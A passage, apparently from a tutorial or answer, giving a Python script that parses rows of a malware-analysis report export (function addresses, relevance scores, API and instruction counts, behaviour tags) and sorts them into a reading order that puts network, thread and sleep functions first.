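APIs |
Memory Dump Source |
"""

LINE_RE = re.compile(
    r"^Function (?P<addr>[0-9A-Fa-f]{8}) Relevance: (?P<rel>\d+(?:\.\d+)?), "
    r"APIs: (?P<apis>\d+),(?: Strings: (?P<strings>\d+),)? "
    r"Instructions: (?P<instr>\d+)(?P<tags>\S*)$"
)


@dataclass
class FunctionSummary:
    address: str
    relevance: float
    apis: int
    strings: int
    instructions: int
    tags: list = field(default_factory=list)


def split_tags(suffix):
    # "threadCOMMON" -> ["thread", "COMMON"]: the export concatenates the
    # lowercase behaviour label and the uppercase badge with no separator.
    return re.findall(r"[a-z]+|[A-Z]+", suffix)


def parse_function_line(line):
    """Parse one summary row; return None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return FunctionSummary(
        address=m["addr"].upper(),
        relevance=float(m["rel"]),
        apis=int(m["apis"]),
        strings=int(m["strings"] or 0),  # assumption: field omitted when zero
        instructions=int(m["instr"]),
        tags=split_tags(m["tags"]),
    )


def parse_report(text):
    """Collect every parseable summary row from an export, skipping residue."""
    funcs = []
    for line in text.splitlines():
        f = parse_function_line(line)
        if f is not None:
            funcs.append(f)
    return funcs


# Analyst's choice of reading order (an assumption, not report semantics):
# code that talks to the network, spawns threads or sleeps is looked at
# before generic window handling; rows with only the COMMON badge go last.
TAG_PRIORITY = {"network": 0, "thread": 1, "sleep": 2, "share": 3, "window": 4}


def prioritize(funcs):
    def key(f):
        best = min((TAG_PRIORITY.get(t, 9) for t in f.tags), default=9)
        return (best, -f.relevance, -f.instructions)
    return sorted(funcs, key=key)


def addresses(funcs):
    return [f.address for f in funcs]


if __name__ == "__main__":
    for f in prioritize(parse_report(SAMPLE_LINES)):
        print(f"{f.address} rel={f.relevance:<4} instr={f.instructions:<4} tags={','.join(f.tags)}")
```

Feed it the whole text export rather than the six sample rows to get a reading order for all listed functions; the regex deliberately rejects anything that is not a summary row, so the collapsed panel headers and empty cells are dropped without special handling.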